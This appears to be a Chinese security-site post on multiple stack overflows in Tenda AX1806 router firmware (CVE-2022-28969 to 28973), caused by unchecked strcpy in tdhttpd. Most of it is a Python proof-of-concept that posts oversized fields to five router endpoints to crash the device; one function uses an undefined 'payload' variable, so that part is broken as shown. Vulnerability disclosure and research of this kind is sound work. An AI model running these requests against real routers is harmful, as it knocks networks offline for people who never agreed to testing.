黑客街 黑客街

Tenda-AX1806路由器多处栈溢出

目录

原文连接

 

Tenda AX1806路由器固件版本 v1.0.0.1,存在多处栈溢出漏洞,漏洞点在 tdhttpd 二进制文件中,使用了危险函数 strcpy 前未对参数长度进行判断,导致拒绝服务漏洞。

 一、 CVE 信 息

通过公布的漏洞编号,得知CVE编号为 CVE-2022-28971、CVE-2022-28972、CVE-2022-28970、CVE-2022-28969、CVE-2022-28973。在CVE网站中查询相关信息,得到漏洞相关信息,基本上都是溢出类漏洞:

Tenda-AX1806路由器多处栈溢出

#

Poc代码如下:

import requests

def CVE_2022_28970():
    data = {
        b"mac": b"A"*0x400
    }
    res = requests.post("http://172.16.96.20/goform/GetParentControlInfo", data=data)
    print(res.content)

def CVE_2022_28973():
    data = {
        b"wanMTU": b'A'*0x800,
    }
    res = requests.post("http://172.16.96.20/goform/AdvSetMacMtuWan", data=data)
    print(res.content)

def CVE_2022_28969():
    data = {
        b"shareSpeed": b'A'*0x800
    }
    res = requests.post("http://172.16.96.20/goform/WifiGuestSet", data=data)
    print(res.content)

def CVE_2022_28971():
    data = {
        b"list": b'A'*0x800,
        b"bindnum": b"1"
    }
    res = requests.post("http://172.16.96.20/goform/SetIpMacBind", data=data)
    print(res.content)

def CVE_2022_28972():
    data = {
        b"ssid": b'A',
        b"timeZone": payload.ljust(0x100,b'A') + b":" + b"A"*0x400
    }
    res = requests.post("http://172.16.96.20/goform/fast_setting_wifi_set", data=data)
    print(res.content)

CVE_2022_28971()

 

What are your Feelings
黑客街导航站是一款努力把互联网安全站点集接到一起,希望为每个小伙伴提供良好的"安全"体验。

街头小贩 匿名追踪 杀软对比

黑客街公众号黑客街

黑客街公众号

我要合作黑客街

我要合作

关于我们 免责说明 商务合作

Copyright © 2022 黑客街   豫ICP备19005024号    站点地图